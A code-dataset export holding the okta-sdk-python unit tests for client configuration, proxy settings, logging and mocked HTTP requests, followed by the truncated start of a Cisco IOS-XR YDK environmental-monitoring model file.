| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
e689dfcea15e90ccab655bb36e285ffc7285b2f5
| 31,549
|
py
|
Python
|
tests/unit/test_client.py
|
jlrgraham23/okta-sdk-python
|
5d4ffa5402b7c1739f571dffd00b205eef5e1761
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_client.py
|
jlrgraham23/okta-sdk-python
|
5d4ffa5402b7c1739f571dffd00b205eef5e1761
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_client.py
|
jlrgraham23/okta-sdk-python
|
5d4ffa5402b7c1739f571dffd00b205eef5e1761
|
[
"Apache-2.0"
] | null | null | null |
import aiohttp
import asyncio
import aiohttp
import logging
from aiohttp.client_reqrep import ConnectionKey
from ssl import SSLCertVerificationError
from okta.client import Client as OktaClient
import pytest
from okta.constants import FINDING_OKTA_DOMAIN
import yaml
import os
from okta.error_messages import ERROR_MESSAGE_API_TOKEN_DEFAULT, \
ERROR_MESSAGE_API_TOKEN_MISSING, ERROR_MESSAGE_AUTH_MODE_INVALID, \
ERROR_MESSAGE_CLIENT_ID_DEFAULT, ERROR_MESSAGE_CLIENT_ID_MISSING,\
ERROR_MESSAGE_ORG_URL_ADMIN, ERROR_MESSAGE_ORG_URL_MISSING, \
ERROR_MESSAGE_ORG_URL_NOT_HTTPS, ERROR_MESSAGE_ORG_URL_TYPO, \
ERROR_MESSAGE_ORG_URL_YOUROKTADOMAIN, ERROR_MESSAGE_SCOPES_PK_MISSING, \
ERROR_MESSAGE_PROXY_MISSING_HOST, ERROR_MESSAGE_PROXY_MISSING_AUTH, \
ERROR_MESSAGE_PROXY_INVALID_PORT
from okta.constants import _GLOBAL_YAML_PATH, _LOCAL_YAML_PATH
from okta.exceptions import HTTPException
from okta.http_client import HTTPClient
"""
Testing Okta Client Instantiation in different scenarios
"""
def test_constructor_user_config_empty(fs):
config = {}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert ERROR_MESSAGE_ORG_URL_MISSING in str(exception_info.value)
assert ERROR_MESSAGE_API_TOKEN_MISSING in str(exception_info.value)
def test_constructor_user_config_url_empty():
config = {'orgUrl': '', 'token': 'TOKEN'}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert ERROR_MESSAGE_ORG_URL_MISSING in str(exception_info.value)
def test_constructor_user_config_url_not_https():
config = {'orgUrl': 'http://test.okta.com', 'token': 'TOKEN'}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert ERROR_MESSAGE_ORG_URL_NOT_HTTPS in str(exception_info.value)
assert FINDING_OKTA_DOMAIN in str(exception_info.value)
def test_constructor_user_config_url_has_yourOktaDomain():
config = {
'orgUrl': 'https://{yourOktaDomain}.okta.com', 'token': 'TOKEN'
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert ERROR_MESSAGE_ORG_URL_YOUROKTADOMAIN in str(exception_info.value)
@ pytest.mark.parametrize("url", ["https://dev-admin.okta.com",
"https://dev-admin.oktapreview.com",
"https://dev-admin.okta-emea.com",
"https://test-admin.okta.com"])
def test_constructor_user_config_url_has_admin(url):
config = {
'orgUrl': url, 'token': 'TOKEN'
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert all(string in str(exception_info.value) for string in [
ERROR_MESSAGE_ORG_URL_ADMIN, f"Current value: {url}"])
def test_constructor_user_config_url_dot_com_twice():
url = 'https://test.okta.com.com'
config = {
'orgUrl': url, 'token': 'TOKEN'
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert all(string in str(exception_info.value) for string in [
ERROR_MESSAGE_ORG_URL_TYPO, f"Current value: {url}"])
def test_constructor_user_config_url_punctuation():
# test for urls with '://' multiple times
url = 'https://://test.okta.com'
config = {
'orgUrl': url, 'token': 'TOKEN'
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert all(string in str(exception_info.value) for string in [
ERROR_MESSAGE_ORG_URL_TYPO, f"Current value: {url}"])
def test_constructor_user_config_token_empty(fs):
config = {'orgUrl': 'https://test.okta.com', 'token': ''}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert ERROR_MESSAGE_API_TOKEN_MISSING in str(exception_info.value)
def test_constructor_user_config_url_has_apiToken(fs):
config = {
'orgUrl': 'https://test.okta.com', 'token': '{apiToken}'
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert ERROR_MESSAGE_API_TOKEN_DEFAULT in str(exception_info.value)
def test_constructor_user_config_auth_mode_invalid():
authorizationMode = "blah"
config = {'orgUrl': "https://test.okta.com",
'token': "TOKEN",
'authorizationMode': authorizationMode}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert all(string in str(exception_info.value) for string in [
ERROR_MESSAGE_AUTH_MODE_INVALID, f"with {authorizationMode}"])
def test_constructor_user_config_SSWS():
org_url = "https://test.okta.com"
token = "TOKEN"
config = {'orgUrl': org_url, 'token': token}
client = OktaClient(user_config=config)
loaded_config = client.get_config()
assert org_url == loaded_config['client']['orgUrl']
assert token == loaded_config['client']['token']
assert 'SSWS' == loaded_config['client']['authorizationMode']
def test_constructor_user_config_Bearer():
authorizationMode = "Bearer"
org_url = "https://test.okta.com"
token = "TOKEN"
config = {'orgUrl': org_url,
'token': token,
'authorizationMode': authorizationMode}
client = OktaClient(user_config=config)
loaded_config = client.get_config()
assert org_url == loaded_config['client']['orgUrl']
assert token == loaded_config['client']['token']
assert authorizationMode == loaded_config['client']['authorizationMode']
@ pytest.mark.parametrize("private_key", ["private key hash",
"pem_file.pem",
"{'Jwks'}"])
def test_constructor_user_config_PK(private_key):
org_url = "https://test.okta.com"
authorizationMode = "PrivateKey"
client_id = "clientID"
scopes = ["scope1"]
config = {
'orgUrl': org_url,
'authorizationMode': authorizationMode,
'clientId': client_id,
'scopes': scopes,
'privateKey': private_key
}
client = OktaClient(user_config=config)
loaded_config = client.get_config()
assert org_url == loaded_config['client']['orgUrl']
assert authorizationMode == loaded_config['client']['authorizationMode']
assert client_id == loaded_config['client']['clientId']
assert scopes == loaded_config['client']['scopes']
assert private_key == loaded_config['client']['privateKey']
def test_constructor_user_config_PK_empty(fs):
org_url = "https://test.okta.com"
authorizationMode = "PrivateKey"
config = {
'orgUrl': org_url,
'authorizationMode': authorizationMode,
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert all(string in str(exception_info.value) for string in [
ERROR_MESSAGE_CLIENT_ID_MISSING, ERROR_MESSAGE_SCOPES_PK_MISSING
])
def test_constructor_user_config_PK_client_id_empty():
org_url = "https://test.okta.com"
authorizationMode = "PrivateKey"
scopes = ["scope1"]
private_key_hash = "private key hash"
config = {
'orgUrl': org_url,
'authorizationMode': authorizationMode,
'clientId': "",
'scopes': scopes,
'privateKey': private_key_hash
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert all(string in str(exception_info.value) for string in [
ERROR_MESSAGE_CLIENT_ID_MISSING
])
def test_constructor_user_config_PK_client_id_default():
org_url = "https://test.okta.com"
authorizationMode = "PrivateKey"
scopes = ["scope1"]
private_key_hash = "private key hash"
config = {
'orgUrl': org_url,
'authorizationMode': authorizationMode,
'clientId': "{clientId}",
'scopes': scopes,
'privateKey': private_key_hash
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert all(string in str(exception_info.value) for string in [
ERROR_MESSAGE_CLIENT_ID_DEFAULT
])
@ pytest.mark.parametrize("scopes,private_key", [([], "private key hash"),
(["scope1"], ""),
([], "")])
def test_constructor_user_config_PK_scopes_and_or_private_key_empty(
scopes,
private_key):
org_url = "https://test.okta.com"
authorizationMode = "PrivateKey"
client_id = "clientID"
config = {
'orgUrl': org_url,
'authorizationMode': authorizationMode,
'clientId': client_id,
'scopes': scopes,
'privateKey': private_key
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert all(string in str(exception_info.value) for string in [
ERROR_MESSAGE_SCOPES_PK_MISSING
])
"""
Testing constructor with YAML configurations
"""
def test_constructor_global_config_SSWS(fs):
fs.pause()
global_sample = os.path.join(os.path.dirname(
__file__), "files", "SSWS-sample-global.yaml")
with open(global_sample) as file:
global_config = yaml.load(file, Loader=yaml.SafeLoader)
org_url = global_config["okta"]["client"]["orgUrl"]
token = global_config["okta"]["client"]["token"]
fs.resume()
fs.create_file(_GLOBAL_YAML_PATH, contents=yaml.dump(global_config))
client = OktaClient()
loaded_config = client.get_config()
assert org_url == loaded_config['client']['orgUrl']
assert token == loaded_config['client']['token']
def test_constructor_local_config_SSWS(fs):
fs.pause()
local_sample = os.path.join(os.path.dirname(
__file__), "files", "SSWS-sample-local.yaml")
with open(local_sample) as file:
local_config = yaml.load(file, Loader=yaml.SafeLoader)
org_url = local_config["okta"]["client"]["orgUrl"]
token = local_config["okta"]["client"]["token"]
fs.resume()
fs.create_file(_LOCAL_YAML_PATH, contents=yaml.dump(local_config))
client = OktaClient()
loaded_config = client.get_config()
assert org_url == loaded_config['client']['orgUrl']
assert token == loaded_config['client']['token']
def test_constructor_global_config_PK(fs):
fs.pause()
global_sample = os.path.join(os.path.dirname(
__file__), "files", "PK-sample-global.yaml")
with open(global_sample) as file:
global_config = yaml.load(file, Loader=yaml.SafeLoader)
org_url = global_config["okta"]["client"]["orgUrl"]
client_id = global_config["okta"]["client"]["clientId"]
private_key = global_config["okta"]["client"]["privateKey"]
fs.resume()
fs.create_file(_GLOBAL_YAML_PATH, contents=yaml.dump(global_config))
client = OktaClient()
loaded_config = client.get_config()
assert org_url == loaded_config['client']['orgUrl']
assert client_id == loaded_config['client']['clientId']
assert private_key == loaded_config['client']['privateKey']
def test_constructor_local_config_PK(fs):
fs.pause()
local_sample = os.path.join(os.path.dirname(
__file__), "files", "PK-sample-local.yaml")
with open(local_sample) as file:
local_config = yaml.load(file, Loader=yaml.SafeLoader)
org_url = local_config["okta"]["client"]["orgUrl"]
client_id = local_config["okta"]["client"]["clientId"]
private_key = local_config["okta"]["client"]["privateKey"]
fs.resume()
fs.create_file(_LOCAL_YAML_PATH, contents=yaml.dump(local_config))
client = OktaClient()
loaded_config = client.get_config()
assert org_url == loaded_config['client']['orgUrl']
assert client_id == loaded_config['client']['clientId']
assert private_key == loaded_config['client']['privateKey']
def test_constructor_env_vars_SSWS():
org_url = "https://test.okta.com"
token = "TOKEN"
os.environ["OKTA_CLIENT_ORGURL"] = org_url
os.environ["OKTA_CLIENT_TOKEN"] = token
client = OktaClient()
loaded_config = client.get_config()
os.environ.pop("OKTA_CLIENT_ORGURL")
os.environ.pop("OKTA_CLIENT_TOKEN")
assert org_url == loaded_config['client']['orgUrl']
assert token == loaded_config['client']['token']
def test_constructor_env_vars_PK():
authorizationMode = "PrivateKey"
org_url = "https://test.okta.com"
client_id = "clientID"
scopes = "scope1,scope2,scope3"
private_key = "private key"
os.environ["OKTA_CLIENT_AUTHORIZATIONMODE"] = authorizationMode
os.environ["OKTA_CLIENT_ORGURL"] = org_url
os.environ["OKTA_CLIENT_CLIENTID"] = client_id
os.environ["OKTA_CLIENT_SCOPES"] = scopes
os.environ["OKTA_CLIENT_PRIVATEKEY"] = private_key
client = OktaClient()
loaded_config = client.get_config()
os.environ.pop("OKTA_CLIENT_ORGURL")
os.environ.pop("OKTA_CLIENT_AUTHORIZATIONMODE")
os.environ.pop("OKTA_CLIENT_CLIENTID")
os.environ.pop("OKTA_CLIENT_SCOPES")
os.environ.pop("OKTA_CLIENT_PRIVATEKEY")
assert authorizationMode == loaded_config['client']['authorizationMode']
assert org_url == loaded_config['client']['orgUrl']
assert client_id == loaded_config['client']['clientId']
assert scopes.split(',') == loaded_config['client']['scopes']
assert private_key == loaded_config['client']['privateKey']
def test_constructor_precedence_highest_rank_local_yaml(fs):
# Setup Global config
fs.pause()
global_sample = os.path.join(os.path.dirname(
__file__), "files", "SSWS-sample-global.yaml")
with open(global_sample) as file:
global_config = yaml.load(file, Loader=yaml.SafeLoader)
global_org_url = global_config["okta"]["client"]["orgUrl"]
global_token = global_config["okta"]["client"]["token"]
fs.resume()
fs.create_file(_GLOBAL_YAML_PATH, contents=yaml.dump(global_config))
# Setup Local config
fs.pause()
local_sample = os.path.join(os.path.dirname(
__file__), "files", "SSWS-sample-local.yaml")
with open(local_sample) as file:
local_config = yaml.load(file, Loader=yaml.SafeLoader)
local_org_url = local_config["okta"]["client"]["orgUrl"]
local_token = local_config["okta"]["client"]["token"]
fs.resume()
fs.create_file(_LOCAL_YAML_PATH, contents=yaml.dump(local_config))
# Create client and validate values
client = OktaClient()
loaded_config = client.get_config()
assert local_org_url == loaded_config['client']['orgUrl']
assert local_token == loaded_config['client']['token']
assert local_org_url != global_org_url
assert local_token != global_token
assert global_org_url != loaded_config['client']['orgUrl']
assert global_token != loaded_config['client']['token']
def test_constructor_precedence_highest_rank_env_vars(fs):
# Setup Local config
fs.pause()
local_sample = os.path.join(os.path.dirname(
__file__), "files", "SSWS-sample-local.yaml")
with open(local_sample) as file:
local_config = yaml.load(file, Loader=yaml.SafeLoader)
local_org_url = local_config["okta"]["client"]["orgUrl"]
local_token = local_config["okta"]["client"]["token"]
fs.resume()
fs.create_file(_LOCAL_YAML_PATH, contents=yaml.dump(local_config))
# Setup env. vars
env_org_url = "https://test.env.okta.com"
env_token = "envTOKEN"
os.environ["OKTA_CLIENT_ORGURL"] = env_org_url
os.environ["OKTA_CLIENT_TOKEN"] = env_token
client = OktaClient()
loaded_config = client.get_config()
os.environ.pop("OKTA_CLIENT_ORGURL")
os.environ.pop("OKTA_CLIENT_TOKEN")
assert local_org_url != loaded_config['client']['orgUrl']
assert local_token != loaded_config['client']['token']
assert local_org_url != env_org_url
assert local_token != env_token
assert env_org_url == loaded_config['client']['orgUrl']
assert env_token == loaded_config['client']['token']
def test_constructor_precedence_highest_rank_user_config():
# Setup env. vars
env_org_url = "https://test.env.okta.com"
env_token = "envTOKEN"
os.environ["OKTA_CLIENT_ORGURL"] = env_org_url
os.environ["OKTA_CLIENT_TOKEN"] = env_token
# Setup user config
user_org_url = "https://test.user.okta.com"
user_token = "userTOKEN"
config = {'orgUrl': user_org_url, 'token': user_token}
client = OktaClient(config)
loaded_config = client.get_config()
os.environ.pop("OKTA_CLIENT_ORGURL")
os.environ.pop("OKTA_CLIENT_TOKEN")
assert user_org_url == loaded_config['client']['orgUrl']
assert user_token == loaded_config['client']['token']
assert user_org_url != env_org_url
assert user_token != env_token
assert env_org_url != loaded_config['client']['orgUrl']
assert env_token != loaded_config['client']['token']
def test_constructor_valid_proxy():
org_url = "https://test.okta.com"
token = "TOKEN"
port = 8080
host = "test.okta.com"
username = "username"
password = "password"
config = {
'orgUrl': org_url,
'token': token,
'proxy': {
'port': port,
'host': host,
'username': username,
'password': password
}
}
# Ensure no error is raised and correct proxy is determined
client = OktaClient(user_config=config)
assert client.get_request_executor(
)._http_client._proxy == f"http://{username}:{password}@{host}:{port}/"
def test_constructor_valid_no_proxy():
org_url = "https://test.okta.com"
token = "TOKEN"
config = {
'orgUrl': org_url,
'token': token
}
# Ensure no error is raised and proxy is None
client = OktaClient(user_config=config)
assert client.get_request_executor(
)._http_client._proxy is None
def test_constructor_valid_env_vars():
org_url = "https://test.okta.com"
token = "TOKEN"
config = {
'orgUrl': org_url,
'token': token
}
# Setting up env vars
os.environ["HTTP_PROXY"] = "http://user:pass@test.okta.com:8080"
os.environ["HTTPS_PROXY"] = "https://user:pass@test.okta.com:8080"
expected = os.environ["HTTPS_PROXY"]
client = OktaClient(user_config=config)
# Deleting env vars
del os.environ['HTTP_PROXY']
del os.environ['HTTPS_PROXY']
# Ensure no error is raised and proxy is None
assert client.get_request_executor(
)._http_client._proxy == expected
def test_constructor_invalid_missing_host():
org_url = "https://test.okta.com"
token = "TOKEN"
port = 8080
username = "username"
password = "password"
config = {
'orgUrl': org_url,
'token': token,
'proxy': {
'port': port,
'username': username,
'password': password
}
}
# Expect error with config
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert ERROR_MESSAGE_PROXY_MISSING_HOST in exception_info.value
@pytest.mark.parametrize("username,password", [("", "password"),
("username", "")])
def test_constructor_invalid_missing_username_or_password(username, password):
org_url = "https://test.okta.com"
token = "TOKEN"
port = 8080
host = "test.okta.com"
config = {
'orgUrl': org_url,
'token': token,
'proxy': {
'port': port,
'host': host,
'username': username,
'password': password
}
}
# Expect error with config
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert ERROR_MESSAGE_PROXY_MISSING_AUTH in exception_info.value
@pytest.mark.parametrize("port", [-1, 0, 65536, "port"])
def test_constructor_invalid_port_number(port):
org_url = "https://test.okta.com"
token = "TOKEN"
host = "test.okta.com"
username = "username"
password = "password"
config = {
'orgUrl': org_url,
'token': token,
'proxy': {
'port': port,
'host': host,
'username': username,
'password': password
}
}
# Expect error with config
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert ERROR_MESSAGE_PROXY_INVALID_PORT in exception_info.value
def test_constructor_custom_http_client_impl():
class CustomHTTPClient(HTTPClient):
pass
org_url = "https://test.okta.com"
token = "TOKEN"
config = {'orgUrl': org_url,
'token': token,
'httpClient': CustomHTTPClient}
client = OktaClient(config)
assert isinstance(client._request_executor._http_client, CustomHTTPClient)
def test_constructor_client_logging():
logger = logging.getLogger('okta-sdk-python')
assert logger.disabled
org_url = "https://test.okta.com"
token = "TOKEN"
config = {'orgUrl': org_url,
'token': token,
'logging': {"enabled": True, "logLevel": logging.DEBUG}}
client = OktaClient(config)
assert not logger.disabled
assert logger.level == logging.DEBUG
def test_client_raise_exception():
org_url = "https://test.okta.com"
token = "TOKEN"
config = {'orgUrl': org_url, 'token': token, 'raiseException': True}
client = OktaClient(config)
with pytest.raises(HTTPException):
asyncio.run(client.list_users())
def test_client_custom_headers(monkeypatch, mocker):
org_url = "https://test.okta.com"
token = "TOKEN"
config = {'orgUrl': org_url, 'token': token}
custom_headers = {'Header-Test-1': 'test value 1',
'Header-Test-2': 'test value 2'}
client = OktaClient(config)
# verify custom headers are set
client.set_custom_headers(custom_headers)
assert client.get_custom_headers() == custom_headers
# mock http requests, verify if custom header is present in request
class MockHTTPRequest():
def __call__(self, **params):
self.request_info = params
self.headers = params['headers']
self.url = params['url']
self.content_type = 'application/json'
self.links = ''
self.text = MockHTTPRequest.mock_response_text
self.status = 200
return self
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
pass
@staticmethod
async def mock_response_text():
return '[{"text": "mock response text"}]'
mock_http_request = MockHTTPRequest()
monkeypatch.setattr(aiohttp.ClientSession, 'request', mock_http_request)
asyncio.run(client.list_users())
assert 'Header-Test-1' in mock_http_request.headers
assert 'Header-Test-2' in mock_http_request.headers
# verify custom headers are cleared
client.clear_custom_headers()
assert client.get_custom_headers() == {}
def test_client_handle_aiohttp_error(monkeypatch, mocker):
org_url = "https://test.okta.com"
token = "TOKEN"
config = {'orgUrl': org_url, 'token': token}
client = OktaClient(config)
class MockHTTPRequest():
def __call__(self, **params):
raise aiohttp.ClientConnectorCertificateError(
ConnectionKey(host=org_url,
port=443,
is_ssl=True,
ssl=None,
proxy=None,
proxy_auth=None,
proxy_headers_hash=None),
SSLCertVerificationError(1,
'[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: '
'unable to get local issuer certificate (_ssl.c:1123)'))
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
pass
@staticmethod
async def mock_response_text():
return '[{"text": "mock response text"}]'
mock_http_request = MockHTTPRequest()
monkeypatch.setattr(aiohttp.ClientSession, 'request', mock_http_request)
res, resp_body, error = asyncio.run(client.list_users())
assert res is None
assert resp_body is None
assert isinstance(error, aiohttp.ClientError)
def test_client_log_debug(monkeypatch, caplog):
org_url = "https://test.okta.com"
token = "TOKEN"
config = {'orgUrl': org_url, 'token': token,
'logging': {'enabled': True, 'logLevel': logging.DEBUG}}
client = OktaClient(config)
class MockHTTPRequest():
def __call__(self, **params):
self.request_info = params
self.headers = params['headers']
self.url = params['url']
self.content_type = 'application/json'
self.links = ''
self.text = MockHTTPRequest.mock_response_text
self.status = 200
return self
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
pass
@staticmethod
async def mock_response_text():
return '[{"embedded": null,' \
'"links": {"self": {"href": "https://test.okta.com/v1/users/test_id"}},' \
'"activated": "2021-01-01T00:00:00.000Z",' \
'"created": "2021-01-01T00:00:00.000Z",' \
'"credentials": null,' \
'"id": "test_id",' \
'"last_login": null,' \
'"profile": {"name": "test_name"},' \
'"status": null,' \
'"status_changed": null,' \
'"transitioning_to_status": null,' \
'"type": null}]'
mock_http_request = MockHTTPRequest()
monkeypatch.setattr(aiohttp.ClientSession, 'request', mock_http_request)
with caplog.at_level(logging.DEBUG):
res, resp_body, error = asyncio.run(client.list_users())
assert 'okta-sdk-python' in caplog.text
assert 'DEBUG' in caplog.text
assert "'method': 'GET'" in caplog.text
assert "'url': 'https://test.okta.com/api/v1/users'" in caplog.text
def test_client_log_info(monkeypatch, caplog):
org_url = "https://test.okta.com"
token = "TOKEN"
config = {'orgUrl': org_url, 'token': token,
'logging': {'enabled': True, 'logLevel': logging.INFO}}
client = OktaClient(config)
class MockHTTPRequest():
def __call__(self, **params):
self.request_info = params
self.headers = params['headers']
self.url = params['url']
self.content_type = 'application/json'
self.links = ''
self.text = MockHTTPRequest.mock_response_text
self.status = 200
return self
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
pass
@staticmethod
async def mock_response_text():
return '[{"embedded": null,' \
'"links": {"self": {"href": "https://test.okta.com/v1/users/test_id"}},' \
'"activated": "2021-01-01T00:00:00.000Z",' \
'"created": "2021-01-01T00:00:00.000Z",' \
'"credentials": null,' \
'"id": "test_id",' \
'"last_login": null,' \
'"profile": {"name": "test_name"},' \
'"status": null,' \
'"status_changed": null,' \
'"transitioning_to_status": null,' \
'"type": null}]'
mock_http_request = MockHTTPRequest()
monkeypatch.setattr(aiohttp.ClientSession, 'request', mock_http_request)
with caplog.at_level(logging.INFO):
res, resp_body, error = asyncio.run(client.list_users())
assert caplog.text == ''
def test_client_log_exception(monkeypatch, caplog):
org_url = "https://test.okta.com"
token = "TOKEN"
config = {'orgUrl': org_url, 'token': token,
'logging': {'enabled': True, 'logLevel': logging.DEBUG}}
client = OktaClient(config)
class MockHTTPRequest():
def __call__(self, **params):
raise aiohttp.ClientConnectorCertificateError(
ConnectionKey(host=org_url,
port=443,
is_ssl=True,
ssl=None,
proxy=None,
proxy_auth=None,
proxy_headers_hash=None),
SSLCertVerificationError(1,
'[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: '
'unable to get local issuer certificate (_ssl.c:1123)'))
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
pass
@staticmethod
async def mock_response_text():
return '[{"text": "mock response text"}]'
mock_http_request = MockHTTPRequest()
monkeypatch.setattr(aiohttp.ClientSession, 'request', mock_http_request)
with caplog.at_level(logging.DEBUG):
res, resp_body, error = asyncio.run(client.list_users())
assert 'Cannot connect to host https://test.okta.com' in caplog.text
def test_client_ssl_context(monkeypatch, mocker):
org_url = "https://test.okta.com"
token = "TOKEN"
mock_ssl_context = mocker.MagicMock()
config = {'orgUrl': org_url, 'token': token, 'sslContext': mock_ssl_context}
client = OktaClient(config)
# mock http requests, verify if custom header is present in request
class MockHTTPRequest():
def __call__(self, **params):
self.request_info = params
self.headers = params['headers']
self.url = params['url']
self.content_type = 'application/json'
self.links = ''
self.text = MockHTTPRequest.mock_response_text
self.status = 200
return self
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
pass
@staticmethod
async def mock_response_text():
return '[{"text": "mock response text"}]'
mock_http_request = MockHTTPRequest()
monkeypatch.setattr(aiohttp.ClientSession, 'request', mock_http_request)
asyncio.run(client.list_users())
assert mock_http_request.request_info['ssl_context'] == mock_ssl_context
@pytest.mark.asyncio
async def test_client_session(mocker):
org_url = "https://test.okta.com"
token = "TOKEN"
# no session
config = {'orgUrl': org_url, 'token': token}
client = OktaClient(config)
assert client._request_executor._http_client._session is None
# with session
config = {'orgUrl': org_url, 'token': token}
async with OktaClient(config) as client:
assert isinstance(client._request_executor._http_client._session, aiohttp.ClientSession)
| 34.631175
| 103
| 0.638499
| 3,606
| 31,549
| 5.307266
| 0.07127
| 0.031038
| 0.048908
| 0.028425
| 0.843348
| 0.793709
| 0.751489
| 0.7181
| 0.705873
| 0.68492
| 0
| 0.005813
| 0.242131
| 31,549
| 910
| 104
| 34.669231
| 0.794605
| 0.02092
| 0
| 0.701681
| 0
| 0.002801
| 0.172911
| 0.014537
| 0
| 0
| 0
| 0
| 0.123249
| 1
| 0.065826
| false
| 0.026611
| 0.021008
| 0
| 0.119048
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6c83a9ab7932e617abbf9c97070c6a218dfe2f8
| 153,611
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_asr9k_sc_envmon_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_asr9k_sc_envmon_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_asr9k_sc_envmon_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
""" Cisco_IOS_XR_asr9k_sc_envmon_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR asr9k\-sc\-envmon package operational data.
This module contains definitions
for the following management objects\:
environmental\-monitoring\-cli\: Environmental Monitoring
Operational data space
environmental\-monitoring\: environmental monitoring
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class EnvironmentalMonitoringCli(_Entity_):
"""
Environmental Monitoring Operational data space
.. attribute:: rack_clis
Table of racks
**type**\: :py:class:`RackClis <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli, self).__init__()
self._top_entity = None
self.yang_name = "environmental-monitoring-cli"
self.yang_parent_name = "Cisco-IOS-XR-asr9k-sc-envmon-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("rack-clis", ("rack_clis", EnvironmentalMonitoringCli.RackClis))])
self._leafs = OrderedDict()
self.rack_clis = EnvironmentalMonitoringCli.RackClis()
self.rack_clis.parent = self
self._children_name_map["rack_clis"] = "rack-clis"
self._segment_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-oper:environmental-monitoring-cli"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli, [], name, value)
class RackClis(_Entity_):
"""
Table of racks
.. attribute:: rack_cli
Number
**type**\: list of :py:class:`RackCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis, self).__init__()
self.yang_name = "rack-clis"
self.yang_parent_name = "environmental-monitoring-cli"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("rack-cli", ("rack_cli", EnvironmentalMonitoringCli.RackClis.RackCli))])
self._leafs = OrderedDict()
self.rack_cli = YList(self)
self._segment_path = lambda: "rack-clis"
self._absolute_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-oper:environmental-monitoring-cli/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis, [], name, value)
class RackCli(_Entity_):
"""
Number
.. attribute:: rack (key)
Rack number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: slot_clis
Table of slots
**type**\: :py:class:`SlotClis <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
